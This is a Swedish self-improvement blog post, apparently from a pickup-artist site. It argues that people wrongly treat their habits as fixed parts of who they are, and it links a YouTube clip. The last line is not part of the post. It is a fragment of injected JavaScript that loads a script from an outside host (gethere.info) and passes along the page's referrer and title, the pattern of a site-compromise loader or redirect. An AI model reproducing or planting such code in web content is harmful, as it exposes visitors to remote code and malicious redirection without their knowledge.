Youtube is the mother of all wisdom.

Or so they say…

Jag såg på ett klipp nyss som fick mig att börja tänka väldigt djupt. Grejen med människor är att de är så jävla trångsynta. De flesta människor bär runt på en själv-bild på hur de är som sträcker sig så långt som till att bestämma sig hur de får göra saker och ting.

T.ex. kan det vara hur de hanterar krograggning. Många människor, främst män, ser det som omöjligt att gå fram till okända kvinnor i en bar eller krog om de inte är fulla. ”Jag är inte sån person” får jag höra som svar ofta när jag ber dessa män gå fram nyktra.

Andra människor har fått för sig att de inte kan kan vara roliga, pratglada eller självsäkra ”Jag är inte den sortens”.

Det värsta är väl när man ser personer som gör saker på helt fel sätt men vägrar ändra på sig för att det är ”vem dem är”. Exempel på detta kan vara att man lutar sig in när man pratar med kvinnor för att ”jag är en person som respekterar vad andra säger” (inte för att C-R lär ut att kvinnor är värdelösa på att hålla vettiga konversationer men när man träffar okända människor så är det bättre att inte lyssna på dem om man måste luta sig in och tränga sig på deras personliga utrymme och framstå som en chode utan vänta med de vettiga konversationerna senare).

Anledningen till att de inte slutar är för att erkänna att man har gjort fel skulle innebära att man suger som person (för att man har länkat att man gör sakerna man gör pga ”[man] är sån som person”) och det är ett stort ”no, no” för de flesta och måste undvikas till all kostnad!

Istället tänker de att de kan kompensera sina fel genom att bara kämpa hårdare och hårdare tills barriären spricker och de fyllt på ”kärleksmätaren” (eller vad det nu är de vill lyckas med) så mycket att inget annat spelar någon roll.

Jag får t.ex. höra väldigt mycket av folk att de inte vill ändra på sina soffpotatis-tv tittandes-tråkmåns liv för att de istället tänker ”har jag bara tillräckligt mycket game-skills så kommer jag kunna ha kvinnor ändå”.

Fast det funkar inte så. Det bara gör inte det. Och istället för att förklara varför med ord så ska jag länka till (24 bildrutor per sekund vilket ger 2 min och 47sek film 4008 bilder. Och en bild säger mer än tusen ord så yeah… ungefär fyra miljoner ord) det klippet jag såg som perfekt illustrerar varför man inte kan tänka så här utan -

- Faktiskt MÅSTE göra rätt!

Länk till filmen: http://www.youtube.com/v/9l-YYqjhVi4&

(sen så är filmen i sig väldigt cool och har ett liknande budskap fast annan inriktning som är väldigt starkt)

Mitt största råd är, precis det som Sanji säger i vår senaste intervju, att sluta tänka att ens beteende på något sätt är länkat till en som person. Du väljer ditt beteende. Du väljer hur du ska vara. Har du vart en looser hela ditt liv så måste det inte fortsätta vara så.Vikten av att göra rätt ligger i att du kan uppnå så otroligt mycket med bara lite kraft om du gör rätt. Jag har en kompis som kämpar i livet mer än någon jag någonsin träffat. Han har tre jobb för att tjäna pengar till att kunna träna och åka till England och andra länder för att provträna för stora lag. (fotboll)Han tränar på elitnivå (ca 13-14 pass i veckan) och är skit grym! Men han har väldigt dåliga vanor som drar ner honom. Han, bland annat;1) Dricker för mycket vilket alltid ger honom onödiga skador och sabbar hans träning2) Han sköter inte sina jobb vilket annars skulle ha gjort att han kunde ha ett istället för tre och genererat mer pengar än alla tre med mindre tid.

Och dessa saker förstör all den möda han lägger ner för att lyckas.

So don’t be like him. Gör av med dåliga vanor och beteenden och för guds skull, när ni gör något tusen gånger och det inte fungerar så TESTA NÅGOT NYTT!

Mvh

- Xtreeme

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;